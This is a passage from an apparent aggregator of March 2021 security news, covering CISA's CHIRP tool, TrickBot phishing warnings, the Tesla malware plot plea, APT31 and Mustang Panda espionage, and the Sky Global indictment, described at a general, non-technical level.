Under the slogan "In Fraud We Trust," the network -- which had more than 10,000 members at its peak -- was one of the top places to buy stolen information, leading to losses of more than $568 million.
Leopard joined the network in 2011 and hosted websites for Infraud members who wished to sell illegal goods and services online, authorities said.
"Today's sentences should serve as a warning to any web host who willingly looks the other way for a quick buck -- and that the United States will hold these bad actors accountable, even when they operate behind a computer screen halfway across the world," Acting Assistant Attorney General Nicholas McQuaid said.
CISA releases CHIRP, a tool to detect SolarWinds malicious activity
22.3.2021 BigBrothers Securityaffairs
US CISA has released a new tool that allows detecting malicious activity associated with the SolarWinds hackers in compromised on-premises enterprise environments.
US CISA released the CISA Hunt and Incident Response Program (CHIRP) tool, is a Python-based tool, that allows detecting malicious activity associated with the SolarWinds hackers in compromised on-premises enterprise Windows environments. Below an excerpt of the CISA’s announcement:
“This Alert announces the CISA Hunt and Incident Response Program (CHIRP) tool. CHIRP is a forensics collection tool that CISA developed to help network defenders find indicators of compromise (IOCs) associated with activity detailed in the following CISA Alerts:”
AA20-352A: Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations, which primarily focuses on an advanced persistent threat (APT) actor’s compromise of SolarWinds Orion products affecting U.S. government agencies, critical infrastructure entities, and private network organizations.
AA21-008A: Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments, which addresses APT activity within Microsoft 365/Azure environments and offers an overview of—and guidance on—available open-source tools. The Alert includes the CISA-developed Sparrow tool that helps network defenders detect possible compromised accounts and applications in the Azure/M365 environment.
Both alerts are related to SolarWinds attacks against government agencies, critical infrastructure, and private sector organizations.
This isn’t the first tool released by the US CISA to detect indicators of compromise in Microsoft environment, early this year the agency’s Cloud Forensics team released another PowerShell-based tool, dubbed Sparrow, that can that helps administrators to detect anomalies and potentially malicious activities in Azure/Microsoft 365 environments.
Similar to Sparrow, CHIRP scans for signs of APT compromise within an on-premises environment, by default it searches for IOCs associated with malicious activity detailed in AA20-352A and AA21-008A alerts.
The CHIRP tool allows to examine Windows event logs for artifacts associated with this activity, Windows Registry for evidence of intrusion, query Windows network artifacts, and apply YARA rules to detect malware, backdoors, or implants.
“The CISA Hunt and Incident Response Program (CHIRP) is a tool created to dynamically query Indicators of Compromise (IoCs) on hosts with a single package, outputting data in a JSON format for further analysis in a SIEM or other tool. CHIRP does not modify any system data.” reads the description provided on GitHub for the tool.
“The initial IoCs are intended to search for activity detailed in CISA Alert AA21-008A that has spilled into the enterprise environment.”
Currently, the tool scans for:
The presence of malware identified by security researchers as TEARDROP and RAINDROP;
Credential dumping certificate pulls;
Certain persistence mechanisms identified as associated with this campaign;
System, network, and M365 enumeration; and
Known observable indicators of lateral movement.
China Slams US Plan to Expel Phone Carriers in Tech Clash
21.3.2021 BigBrothers Securityweek
China’s government on Thursday called on Washington to drop efforts to expel three state-owned Chinese phone companies from the United States in a new clash over technology and security.
The Federal Communications Commission voted Wednesday to begin revoking the companies’ U.S. licenses. It said they are security risks controlled by the communist Beijing government.
The foreign ministry accused Washington of misusing security complaints to hurt Chinese commercial competitors.
The United States should “stop the wrong practice of generalizing the concept of national security and politicizing economic issues” and “stop abusing state power to unreasonably suppress Chinese enterprises,” said a ministry spokesman, Zhao Lijian.
The decision adds to mounting U.S.-Chinese conflict over the ruling Communist Party’s industrial plans, access to American technology and accusations of computer attacks and theft of business secrets.
President Joe Biden has said he wants a better relations with Beijing but has given no indication he will roll back sanctions imposed by his predecessor, Donald Trump, that limit Chinese access to U.S. technology and financial markets.
The latest announcement came as U.S. and Chinese envoys were flying to Alaska for the highest-level face-to-face meeting between the two sides since Biden took office in January.
Zhao said Beijing will “take necessary measures to safeguard the legitimate rights and interests of Chinese enterprises” but gave no details. Officials have issued similar warnings in the past but those usually have resulted in no action.
The latest action targets China Unicom Americas, a unit of China Unicom Ltd.; Pacific Networks Corp. and ComNet (USA) LLC, a unit of Pacific Networks. They sell international voice and data service.
The companies were ordered to explain their ownership and operations, and “failed to address the serious national security threats posed by their continued operation in the U.S.,” said Commissioner Brendan Car in a statement.
National security officials “advise that traffic on these networks ‘remains subject to exploitation, influence, and control by the Chinese government,’” Carr said. He said some Chinese telecom companies have operated in the United States for decades and “security threats have evolved substantially in the intervening years.”
Earlier, state-owned China Mobile Ltd. was blocked in 2019 from entering the U.S. market on security grounds.
Trump also blocked access to most U.S. technology for telecom equipment giant Huawei Technologies Ltd. and some other Chinese tech companies. Trump issued an order prohibiting Americans from investing in securities of companies deemed by the Pentagon to be linked to China’s military.
Russian National pleads guilty to conspiracy to plant malware on Tesla systems
20.3.2021 BigBrothers Securityaffairs
The Russian national who attempted to convince a Tesla employee to plant malware on Tesla systems has pleaded guilty.
The U.S. Justice Department announced on Thursday that the Russian national Egor Igorevich Kriuchkov (27), who attempted to convince a Tesla employee to install malware on the company’s computers, has pleaded guilty.
“A Russian national pleaded guilty in federal court today for conspiring to travel to the United States to recruit an employee of a Nevada company into a scheme to introduce malicious software into the company’s computer network.” read a press release published by the DoJ.
In September Kriuchkov has been indicted in the United States for conspiring to recruit a Tesla employee to install malware onto the company’s network.
The man was arrested on August 22 and appeared in court on August 24. Kriuchkov offered $1 million to the unfaithful employee of the US company.
Kriuchkov conspired with other criminals to recruit the employee of an unnamed company in Nevada. At the end of August, Elon Musk confirmed that Russian hackers attempted to recruit an employee to install malware into the network of electric car maker Tesla.
Teslarati confirmed that the employee contacted by the crooks is a Russian-speaking, non-US citizen working at Tesla-owned lithium-ion battery and electric vehicle subassembly factory Giga Nevada.
The Russian man and his co-conspirators were planning to exfiltrate data from the network of the company and blackmail the organization to leak stolen data, unless the company paid a ransom demand.
A few days after meeting the employee, Kriuchkov exposed his plan to the employee offering him between $500,000 and $1,000,000 for the dirty job. The malware would provide Kriuchkov and co-conspirators, the malicious code was specifically designed to steal information from Tesla.
The employee decided to warn Tesla and the company reported the attempt to the FBI. The employee had more meetings with Kriuchkov that were surveilled by the FBI. On August 22, the FBI arrested Kriuchkov.
“The swift response of the company and the FBI prevented a major exfiltration of the victim company’s data and stopped the extortion scheme at its inception,” said Acting Assistant Attorney General Nicholas L. McQuaid of the Justice Department’s Criminal Division. “This case highlights the importance of companies coming forward to law enforcement, and the positive results when they do so.”
“This case highlights our office’s commitment to protecting trade secrets and other confidential information belonging to U.S. businesses — which is becoming even more important each day as Nevada evolves into a center for technological innovation,” said Acting U.S. Attorney Christopher Chiou for the District of Nevada. “Along with our law enforcement partners, we will continue to prioritize stopping cybercriminals from harming American companies and consumers.”
“This is an excellent example of community outreach resulting in strong partnerships, which led to proactive law enforcement action before any damage could occur,” said Special Agent in Charge Aaron C. Rouse of the FBI’s Las Vegas Field Office.
Kriuchkov will be sentenced on May 10.
CISA and FBI warn of ongoing TrickBot attacks
20.3.2021 BigBrothers Securityaffairs
CISA and FBI are warning of ongoing TrickBot attacks despite security firms took down the C2 infrastructure of the infamous botnet in October.
The Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) warn of ongoing Trickbot attacks despite in October multiple security firms dismantled its C2 infrastructure in a joint operation.
On Wednesday, the two US agencies published an advisory to warn organizations of a new wave of attacks conducted by cybercrime actors that are leveraging a traffic infringement phishing scheme to trick victims into installing the TrickBot malware.
“The Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) have observed continued targeting through spearphishing campaigns using TrickBot malware in North America. A sophisticated group of cybercrime actors is luring victims, via phishing emails, with a traffic infringement phishing scheme to download TrickBot.” reads the advisory.
TrickBot is a popular banking Trojan that has been around since October 2016, its authors have continuously upgraded it by implementing new features.
In October, Microsoft’s Defender team, FS-ISAC, ESET, Lumen’s Black Lotus Labs, NTT, and Broadcom’s cyber-security division Symantec joined the forces and announced a coordinated effort to take down the command and control infrastructure of the infamous TrickBot botnet.
Even if Microsoft and its partners have brought down the TrickBot infrastructure TrickBot operators attempted to resume the operations by setting up new command and control (C&C) servers online.
Following the takedown, the operators behind the TrickBot malware have implemented several improvements to make it more resilient.
A few days after the TrickBot takedown, Netscout researchers spotted a new TrickBot Linux variant that was used by its operators.
Security researchers also reported that the botnet was used to spread other threats, such as Ryuk ransomware, Conti ransomware, and also an Emotet downloader.
“CISA and FBI are aware of recent attacks that use phishing emails, claiming to contain proof of a traffic violation, to steal sensitive information. The phishing emails contain links that redirect to a website hosted on a compromised server that prompts the victim to click on photo proof of their traffic violation.” continues the report. “In clicking the photo, the victim unknowingly downloads a malicious JavaScript file that, when opened, automatically communicates with the malicious actor’s command and control (C2) server to download TrickBot to the victim’s system.”
Upon clicking on the image hosted on the compromised website, a malicious JavaScript file is downloaded and run, then the malicious code connects to the attackers’ C2 server to fetch and execute the bot on the victim’s machine.
The joint advisory includes Indicators of Compromise (IoCs) and mitigations for these attacks.
Russian Man Pleads Guilty to Role in Attempt to Plant Malware on Tesla Systems
20.3.2021 BigBrothers Securityweek
The Russian national who attempted to convince a Tesla employee to plant malware on the company’s computers has pleaded guilty, the U.S. Justice Department announced on Thursday.
Egor Igorevich Kriuchkov, 27, has pleaded guilty to one count of conspiracy to intentionally cause damage to a protected computer. He initially faced up to five years in prison, but he will likely get a lighter sentence as a result of his plea agreement.
Kriuchkov is accused of conspiring with others to convince an employee of Tesla to plant malware on the electric car maker’s network as part of a ransomware attack. They had also planned on launching a DDoS attack to distract the company while the malware allowed them to steal valuable data.
The Russian traveled to the U.S. in July 2020 on a tourist visa and contacted the targeted Tesla employee, who was located in Nevada, shortly after.
The employee was initially offered $500,000 for his assistance, but the offer was later doubled. Even so, the employee decided to inform Tesla about the cybercriminals’ plan and the company notified the FBI, which organized a sting operation.
Kriuchkov was arrested in August 2020 and in September he pleaded not guilty. He will be sentenced on May 10.
Prime Minister Boris Johnson wants to enhance UK cyber capabilities
19.3.2021 BigBrothers Securityaffairs
Prime Minister Boris Johnson declared that Britain needs to boost its cyber capability to conduct cyber attacks on foreign hostile actors.
Prime Minister Boris Johnson said that his government needs to boost its capability to conduct cyber attacks on foreign threat actors.
“Cyber power is revolutionising the way we live our lives and fight our wars, just as air power did 100 years ago,” Johnson said in a statement released by his office and reported by the Reuters agency.
The announcement comes ahead of the presentation of a long-term review of national security strategy to parliament on Tuesday which could lead to a reduction in armed forces personnel.
Prime Minister Boris Johnson recognizes the importance of protecting his country from attacks originating in cyberspace, a new domain of warfare.
“The review will set out the importance of cyber technology to our way of life – whether it’s defeating our enemies on the battlefield, making the internet a safer place or developing cutting-edge tech to improve people’s lives,” continues Johnson’s statement.
In 2019, the UK government spent 2.1% of national income, roughly $59 billion, on defence, more than any other European country.
Johnson has yet to confirm the cuts in the defence personnel, it only confirmed that the National Cyber Force would have a permanent base in northern England as the government tries to boost regional development outside London.
The National Cyber Force (NCF) NCF plays a crucial role in enhancing its offensive cyber capabilities.
Last year, the UK government announced a new defence spending of £16.5 billion ($22bn), part of which has been assigned to the creation of the National Cyber Force. The British government also reserved part of the spending for the creation of a Space Command and agency dedicated to AI. The NCF is composed of personnel from intelligence, cyber and security agency GCHQ, the MoD, the Secret Intelligence Service (MI6) and the Defence Science and Technology Laboratory (Dstl).
The National Cyber Force will be involved in of cyber operations like:
Interfering with a mobile phone to prevent a terrorist from being able to communicate with their contacts;
Helping to prevent the internet from being used as a global platform for serious crimes, including sexual abuse of children and fraud; and
Keeping UK military aircraft safe from targeting by hostile weapons systems.
US Charges Swiss ‘Hacktivist’ for Data Theft and Leaks
19.3.2021 BigBrothers Securityweek
The Justice Department has charged a Swiss hacker with computer intrusion and identity theft, just over a week after the hacker took credit for helping to break into the online systems of a U.S. security-camera startup.
An indictment against 21-year-old Till Kottmann was brought Thursday by a grand jury in the Seattle-based Western District of Washington.
Federal prosecutors said Thursday that Kottmann, of Lucerne, Switzerland, was initially charged in September. The range of allegations date back to 2019 and involve stealing credentials and data and publishing source code and proprietary information from more than 100 entities, including companies and government agencies.
Kottmann had described the most recent hack and leak of camera footage from customers of California security-camera provider Verkada as part of a “hacktivist” cause of exposing the dangers of mass surveillance.
Acting U.S. Attorney Tessa Gorman rejected those motives in a statement Thursday.
“These actions can increase vulnerabilities for everyone from large corporations to individual consumers,” Gorman wrote. “Wrapping oneself in an allegedly altruistic motive does not remove the criminal stench from such intrusion, theft, and fraud.”
Kottmann didn’t immediately return an online request for comment Thursday.
Swiss authorities said they had raided Kottmann’s home in Lucerne late last week at the request of U.S. authorities. It’s not clear if U.S. prosecutors intend to extradite Kottmann, who remains in Lucerne and was notified of the pending charges. Prosecutors say the FBI recently seized a website domain that Kottmann used to publish hacked data online.
The indictment ties a number of hacks to Kottmann over the past year, including one targeting an unnamed security device manufacturer based in the Seattle region and another affecting a maker of tactical equipment.
In several cases, prosecutors said Kottmann improperly used valid employee credentials to gain access to source code databases. The indictment says Kottmann also hacked the Washington state Department of Transportation, an automobile manufacturer and a financial investment company.
The indictment doesn’t specifically mention last week’s high-profile hack of Verkada, which drew attention because it exposed live camera feeds and archived video footage from schools, jails, factories, gyms and corporate offices.
Kottmann, who uses they/them pronouns, told The Associated Press last week they belonged to a group nicknamed APT-69420 Arson Cats, a small collective of “primarily queer hackers, not backed by any nations or capital but instead backed by the desire for fun, being gay and a better world.”
Kottmann has previously attracted attention for leaking hacked material to expose security flaws, including from U.S. chipmaker Intel last year.
The indictment attempts to tie Kottmann’s efforts at self-promotion, including designing and selling clothing related to hacking and “anti-intellectual-property ideology,” into part of a broader conspiracy to commit computer fraud.
Finland IDs Hackers Linked to Parliament Spying Attack
19.3.2021 BigBrothers Securityweek
Finland’s domestic security agency said Thursday that the cybergroup APT31, which is generally linked to the Chinese government, was likely behind a cyberspying attack on the information systems of the Nordic country’s parliament.
The Finnish Security and Intelligence Service, known by the abbreviation Supo, said it had “identified a cyber espionage operation targeted in 2020 against parliament with the aim of intruding into parliament’s IT systems.”
The agency added that “according to Supo intelligence, APT31 was responsible for the attack”. It didn’t mention China by name or the group’s alleged links to the government in Beijing. The statement posted also on the agency’s Twitter site in English.
Finland’s National Bureau of Investigation, NBI, said late December that it had started an investigation into suspected gross hacking and espionage attacks on the information systems of Eduskunta, the Finnish legislature. Among other things, some lawmakers’ email accounts were compromised.
Parliament has since upgraded the systems’ security features.
NBI’s Tero Muurman, who is in charge of the investigation, said Thursday his agency was probing further Supo’s allegation of APT31′s involvement. He said the breach likely aimed to “acquire information for the benefit of a foreign nation or to harm Finland.”
FireEye, one of the world’s major cybersecurity firms, and other data security firms have linked APT31 to the Chinese government or operations conducted on its orders.
APT is an abbreviation for “advanced persistent threat,” a general term to describe an attack in which an intruder — or intruders — establishes an illicit and usually long-term presence on a network to acquire highly sensitive data.
Earlier this month, Supo said that the intelligence services of foreign powers have expanded their cyber espionage operations in Finland during the COVID-19 pandemic through either directly targeting Finnish organizations or using Finnish infrastructure.
The agency has earlier named China and Russia as being the most active countries spying on Finland.
Arctic issues is an area of particular interest to China in the Nordic countries.
The Finnish public broadcaster YLE reported earlier March that the state-funded Polar Research Institute of China attempted in 2018 to buy or lease an airport near the small northern town of Kemijarvi in the Lapland area, Finland’s Arctic region, for research flights over the North Pole and other Arctic regions. The Finnish military, however, blocked the deal on security concerns, as the airport is close to a military area.
The parliament of Norway, Finland’s Nordic neighbor, was hit by a cyberattack last year that the country’s domestic security agency said was probably done by the hacking group APT28, which has been linked to Russia’s GRU military intelligence agency.
Five Months After Takedown Attempt, CISA and FBI Warn of Ongoing TrickBot Attacks
19.3.2021 BigBrothers Securityweek
Attacks employing the TrickBot malware continue, leveraging phishing emails as the initial infection vector, the Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) warn.
In a joint advisory published on Wednesday, the two agencies revealed that a sophisticated group of cybercrime actors is leveraging a traffic infringement phishing scheme to lure victims into downloading the TrickBot malware.
Initially observed in 2016 and believed to be the work of the threat actors behind the Dyre Trojan, TrickBot has become one of the most prevalent malware families out there, ensnaring machines into a botnet that was being offered under a malware-as-a-service model to both nation-states and cyber-crime groups.
In October 2020, Microsoft announced the takedown of the infrastructure behind TrickBot, but the malware survived the attempt. In fact, weeks later, it received several updates that increased its resilience against similar attempts and also provided it further compromise capabilities.
Now, CISA and the FBI reveal they have observed “continued targeting through spearphishing campaigns using TrickBot malware in North America,” thus confirming that TrickBot’s operators were able to restore their malicious operation.
“CISA and FBI are aware of recent attacks that use phishing emails, claiming to contain proof of a traffic violation, to steal sensitive information. The phishing emails contain links that redirect to a website hosted on a compromised server that prompts the victim to click on photo proof of their traffic violation,” the joint advisory reads.
Once the victim clicks on the image, however, a malicious JavaScript file is downloaded. When executed, the file connects to the attackers’ command and control (C&C) server to fetch and run TrickBot on the victim’s system.
A modular piece of malware, TrickBot is capable of stealing information from the victims’ browsers, spread laterally across the network, gather system information, manipulate system data, exfiltrate information, mine for crypto-currency, search for vulnerabilities in system firmware, and drop additional payloads onto the system, such as Emotet or the Ryuk and Conti ransomware.
In their joint advisory, CISA and FBI included a series of recommendations for network defenders looking to improve their security posture and stay better protected against TrickBot attacks. The recommendations apply to security teams at federal, state, local, tribal, and territorial governments, but also to those in the private sector.
U.S. Says Russia, Iran Attempted Interference in 2020 Presidential Election
19.3.2021 BigBrothers Securityweek
A declassified joint report from several United States agencies assesses that Russian and Iranian threat actors did attempt to meddle in the 2020 U.S. presidential election, but claims that the technical integrity of the voting process wasn’t affected.
The declassified version of the report includes key judgments from the classified report to the president, but without full supporting information and without providing details on specific intelligence methods, reports, and sources.
The joint report is meant to provide information on the extent to which foreign actors attempted interference with the 2020 U.S. elections, along with details on whether these adversaries targeted political organizations, campaigns, or election candidates, and an assessment on whether the attacks were able to successfully compromise the targeted infrastructure.
Without attempting to assess the effect of foreign interference on public perception or on the behavior of voters, the joint report reveals that there’s no evidence that foreign government-affiliated actors were able to prevent or alter votes, or disrupt the ability to tally votes or deliver election results, or compromised the integrity of voter registration information.
However, Russian and Iranian adversaries did target critical infrastructure sectors and successfully compromised “the security of several networks that managed some election functions.” The integrity of voter data and the technical aspect of the voting process, however, were not impacted.
“We identified several incidents when Russian, Chinese, and Iranian government-affiliated actors materially impacted the security of networks associated with or pertaining to US political organizations, candidates, and campaigns during 2020 federal elections,” the Department of Justice (DOJ) and the Department of Homeland Security (DHS) say.
According to the report, the Kremlin authorized influence operations that sought to denigrate President Biden’s candidacy, undermine people’s confidence in the election process, or support former President Trump. However, there were no persistent attempts from Russian actors to compromise the election infrastructure, the report reveals.
State-sponsored Iranian threat actors, the report claims, engaged in an influence campaign meant to “undercut former President Trump’s reelection prospects” and undermine confidence in the election process.
China, on the other hand, “did not deploy interference efforts and considered but did not deploy influence efforts intended to change the outcome of the U.S. Presidential election,” the report reads. The reason, the agencies say, was that China was looking to strengthen its relations with the U.S.
Other foreign actors, such as Lebanese Hizballah, Cuba, and Venezuela, also made small attempts to influence the elections, mainly driven by financial reasons. However, they are believed to have failed in their attempts, despite public claims, the report reads.
“We have no evidence—not through intelligence collection on the foreign actors themselves, not through physical security and cybersecurity monitoring of voting systems across the country, not through post-election audits, and not through any other means—that a foreign government or other actors compromised election infrastructure to manipulate election results,” the DoJ and DHS say.
Regardless, the agencies do make a series of recommendations on how to improve the overall resilience of the electoral process to interference attempts, including through cyber and physical security hygiene, management of third-party vendor security and supply-chain risks, and public messaging and education.
Polish State Websites Hacked and Used to Spread False Info
19.3.2021 BigBrothers Securityweek
Two Polish government websites were hacked Wednesday and used briefly to spread false information about a non-existent radioactive threat, in what a Polish government official said had the hallmarks of a Russian cyberattack.
The National Atomic Energy Agency and Health Ministry websites briefly carried claims of a supposed nuclear waste leak coming from neighboring Lithuania and threatening Poland.
In addition, the Twitter account of a journalist who often writes about Russian and eastern European affairs was also hacked and used to further spread the information.
Stanislaw Zaryn, spokesman for the head of the country’s security services, told The Associated Press that “the whole story looked like a typical Russian attempt” to sow suspicion and division among Western allies.
Zaryn said it recalled a similar hacking attempt in 2020 which spread false information about a non-existent radioactive cloud heading to Poland from Chernobyl in Ukraine — the site of a nuclear disaster in the 1980s.
Wednesday’s false statement warned that the health and lives of Polish people living in an area close to the Lithuanian border were in danger. But the messages apparently did not receive much notice.
State-sponsored Threat Groups Target Telcos, Steal 5G Secrets
18.3.2021 BigBrothers Threatpost
Researchers say China-linked APTs lure victims with bogus Huawei career pages in what they dub ‘Operation Diànxùn’.
Chinese-language APTs are targeting telecom companies in cyberespionage campaigns aimed at stealing sensitive data and trade secrets tied to 5G technology, according to researchers.
The campaigns, dubbed “Operation Diànxùn”, target and lure victims working in the telecom industry. A typical ploy includes a fake website designed to mimic telco-giant’s Huawei career page.
“While the initial vector for the infection is not entirely clear. [We believe] with a medium level of confidence that victims were lured to a domain under control [a] the threat actor, from which they were infected with malware,” according to McAfee researchers in a Tuesday report.
Given the tactics used in the campaign, researchers surmised it to be the work of known Chinese-language APTs RedDelta and Mustang Panda. RedDelta was last believed to be behind cyberattacks against the Vatican and other Catholic Church-related institutions last year. In those attacks, adversaries leveraged spear phishing emails laced with malware that ultimately pushed the PlugX remote access tool (RAT) as the final payload.
Meanwhile, Mustang Panda has been linked to cyberespionage attacks on non-governmental organizations (NGOs) with a focus on gathering intelligence on Mongolia by using shared malware like Poison Ivy or PlugX. The group also is known to shift tactics and adopt new tools quickly, researchers have noted.
This time around, the groups seem to be gunning for sensitive data and aiming “to spy on companies related to 5G technology,” researchers wrote. The campaign is likely related to a number of countries’ decision to ban the use of Chinese equipment from Huawei in the global rollout of the next-generation wireless telecommunications technology, researchers suggested.
The APTs used a multi-phased approach to the attacks, with the initial delivery vector likely coming in the form of a phishing attack using the internet as the first point of contact with victims, researchers said with “a medium level of confidence.”
Once someone falls for this aspect of the campaign, the second phase executes a .NET payload on the victim’s endpoint by leveraging Flash-based artifacts malware, according to the report.
“While the execution of the initial fake Flash installer acts mainly like a downloader, the [.NET] payload contains several functions and acts as a utility to further compromise the machine,” researchers wrote. “This is a tool to manage and download backdoors to the machine and configure persistence.”
In the third and final phase of the attack, threat actors create a a backdoor for remote control of the victim via a Command and Control Server and Cobalt Strike Beacon, according to the report.
Researchers recommend “an adaptive and integrated security architecture” to defend against multi-layered attacks such as Diànxùn, “which will make it harder for threat actors to succeed and increase resilience in the business.”
China-linked hackers target telcos to steal 5G secrets
18.3.2021 BigBrothers Securityaffairs
Chinese APT groups are targeting telecom companies in cyberespionage campaigns collectively tracked as Operation Diànxùn, to steal 5G secrets.
Chinese-language threat actors are targeting telecom companies, as part of a cyber espionage campaign tracked as ‘Operation Diànxùn,’ to steal sensitive data and trade secrets tied to 5G technology.
Hackers behind these campaigns are targering people working in the telecom industry. In some attacks, threat actors set up a fake website designed to mimic telco-giant’s Huawei career page.
According to the researchers, the tactics, techniques and procedures (TTPs) used in the campaign are compatible with the operations associated with Chinese RedDelta and Mustang Panda cyberespionage groups.
“While the initial vector for the infection is not entirely clear, the McAfee ATR team believes with a medium level of confidence that victims were lured to a domain under control of the threat actor, from which they were infected with malware which the threat actor leveraged to perform additional discovery and data collection.” reads the report published by McAfee. “It is our belief that the attackers used a phishing website masquerading as the Huawei company career page.”.
RedDelta was suspected to be behind the attacks against the Vatican and other Catholic Church-related institutions in 2020, the group employed PlugX RAT to compromise the victims’ systems.
Mustang Panda past operations include attacks on NGOs, the group used malware commonly associated with China-linked APT groups, such as Poison Ivy or PlugX.
The cyber espionage campaign is aligned with interest of the Chinese Government, it focuses on the adoption of Chinese 5G technologies by multiple countries worldwide.
Attackers used a .NET payload as a second-stage malware that was delivered tricking the victims into executing Flash-based artifacts malware.
“While the execution of the initial fake Flash installer acts mainly like a downloader, the [.NET] payload contains several functions and acts as a utility to further compromise the machine,” continues the report. “This is a tool to manage and download backdoors to the machine and configure persistence.”
In the final stage, attackers deploy a backdoor to take over the victim’s system.
Chinese Cyberspies Target Telecom Companies in America, Asia, Europe
18.3.2021 BigBrothers Securityweek
China-linked cyber-espionage group Mustang Panda is targeting telecommunications companies in Asia, Europe, and the United States for espionage purposes, according to a warning from security researchers at McAfee.
Also referred to as RedDelta and TA416, the threat actor has been previously associated with the targeting of entities in connection with the Vatican - Chinese Communist Party diplomatic relations, along with some entities in Myanmar.
The new malware attacks, McAfee says, employ the same tactics, techniques and procedures (TTPs) previously associated with Mustang Panda. The initial vector of infection hasn’t been identified, but the researchers believe that victims were being lured to a fake website crafted to mimic the legitimate career site for Chinese tech giant Huawei.
The first stage of the attack leverages a fake Flash application and a phishing page mimicking the original website, while the second stage is a .Net payload executed to further compromise the machine through downloading and managing backdoors. A Cobalt Strike beacon payload is delivered as a third stage.
Referred collectively as Operation Diànxùn, the new attacks were targeted at telecommunication companies in based in Southeast Asia, Europe, and the United States. The adversary, McAfee says, shows strong interest in German, Vietnamese, and Indian telecommunication companies.
“Combined with the use of the fake Huawei site, we believe with a high level of confidence that this campaign was targeting the telecommunication sector. We believe with a moderate level of confidence that the motivation behind this specific campaign has to do with the ban of Chinese technology in the global 5G roll-out,” McAfee says.
The campaign, the researchers note, is believed to have been aimed at the theft of sensitive or secret information related to 5G technology. McAfee also notes that it has no evidence that Huawei was knowingly involved in these attacks.
Russia Threatens to Block Twitter in a Month
17.3.2021 BigBrothers Securityweek
Russian authorities said Tuesday they would block Twitter in a month if it doesn’t take steps to remove banned content, a move that escalates the Russian government’s drawn-out standoff with social media platforms that have played a major role in amplifying dissent in Russia.
Russia’s state communications watchdog, Roskomnadzor, last week announced it was slowing down the speed of uploading photos and videos to Twitter over its alleged failure to remove content encouraging suicide among children and information about drugs and child pornography.
The agency said Twitter has failed to remove more than 3,000 posts with banned content, including more than 2,500 posts encouraging suicide among minors. The platform responded by emphasizing its policy of zero tolerance for child sexual exploitation, promotion of suicide and drug sales.
On Tuesday, deputy chief of Roskomnadzor Vadim Subbotin argued that Twitter still wasn’t complying with the demands of the Russian authorities.
“Twitter doesn’t react to our requests appropriately, and if things go on like this, then in a month it will be blocked, on an out-of-court basis,” Subbotin told the Interfax news agency. He added that Roskomnadzor at this point “is not registering specific steps by Twitter to remove prohibited content.”
Twitter did not respond immediately to an email request for comment.
Authorities have criticized social media platforms that have been used to bring tens of thousands of people into the streets across Russia this year to demand the release of jailed Russian opposition leader Alexei Navalny. The wave of demonstrations was the largest in years and posed a major challenge to the Kremlin.
The authorities alleged social media platforms failed to remove calls for children to join the protests. Russian President Vladimir Putin has urged police to act more to monitor social platforms and to track down those who “draw the children into illegal and unsanctioned street actions.”
The government’s efforts to tighten control of the internet and social media date back to 2012, when a law allowing authorities to blacklist and block certain online content was adopted. Since then, a growing number of restrictions targeting messaging apps, websites and social media platforms have been introduced.
In 2014, authorities adopted a law requiring online services to store the personal data of Russian users on servers in Russia and have since tried to make Facebook and Twitter comply with it. Both companies have been repeatedly fined, first small amounts of around $50 and last year the equivalent of $63,000 each, for not complying.
The government has repeatedly aired threats to block the two social media giants, but stopped short of outright bans even though the law allows it, probably fearing the move would elicit too much public outrage. Only the social network LinkedIn, which wasn’t very popular in Russia, has been banned by the authorities for the failure to store user data in Russia.
However, some experts have said that the authorities might be seriously considering the possibility of bans this time around.
Subbotin said Tuesday that Roskomnadzor has the necessary “technical capabilities” to block Twitter, and that the agency doesn’t rule out slowing down or blocking other online platforms if they “violate Russian laws and don’t comply with Roskomnadzor’s demands.”
In 2018, Roskomnadzor failed to restrict access to the popular messaging app Telegram over its refusal to hand over encryption keys used to scramble messages. Last year, the watchdog officially withdrew the demands to block Telegram, which has been widely used despite the ban, including by government institutions.
US DoJ indicted the CEO of Sky Global encrypted chat platform
16.3.2021 BigBrothers Securityaffairs
The CEO of the encrypted communications firm Sky Global has been indicted in the US on charges of facilitating international drug trafficking
The head of the Canada-based company Sky Global that provides encrypted communications, Jean-Francois Eap, has been indicted in the US on charges of facilitating international drug trafficking.
The Justice Department indicted Jean-Francois Eap and Thomas Herdman, a former high-level distributor of Sky Global devices.
“A federal grand jury today returned an indictment against the Chief Executive Officer and an associate of the Canada-based firm Sky Global on charges that they knowingly and intentionally participated in a criminal enterprise that facilitated the transnational importation and distribution of narcotics through the sale and service of encrypted communications devices.” reads the press release published by the DoJ.
“Jean-Francois Eap, Sky Global’s Chief Executive Officer, and Thomas Herdman, a former high-level distributor of Sky Global devices, are charged with a conspiracy to violate the federal Racketeer Influenced and Corrupt Organizations Act (RICO).”
The authorities also issued warrants for their arrests today
According to the indictment, Sky Global’s devices are specifically designed to prevent eavesdropping and investigation conducted by the police on criminal activities of members of transnational organizations involved in drug trafficking and money laundering.
One of the features implemented by Sky Global in its devices consists of the remote wipe of the messages in case of seizure by law enforcement.
Sky Global software is available for iPhone, Google Pixel, Blackberry, and Nokia devices. The software allows devices to communicate with each other routing the communications in a closed network managed by the firm, whose servers are located in Canada and France.
At least 70,000 Sky Global devices are used worldwide, including in the United States.
“According to the indictment, Sky Global’s purpose was to create, maintain, and control a method of secure communication to facilitate the importation, exportation, and distribution of heroin, cocaine and methamphetamine into Australia, Asia, Europe, and North America, including the United States and Canada; to launder the proceeds of such drug trafficking conduct; and to obstruct investigations of drug trafficking and money laundering organizations by creating, maintaining, and controlling a system whereby Sky Global would remotely delete evidence of such activities.” continues the DoJ.
Last week, a joint operation conducted by the European police and coordinated by Europol lead to the arrest of at least 80 people after shutting down the Sky Global Sky ECC encrypted phone network used by organized crime groups.
The police claimed to have compromised the Sky ECC network and eavesdropped on suspects’ communications.
According to the indictment, Sky Global employees allowed their customers to pay using digital currencies (i.e. Bitcoin) to anonimize the illegal transactions, protecting customers’ anonymity.
“According to the indictment, Sky Global employees also set up and maintained shell companies to hide the proceeds generated by selling its encryption services and devices.” states DoJ.
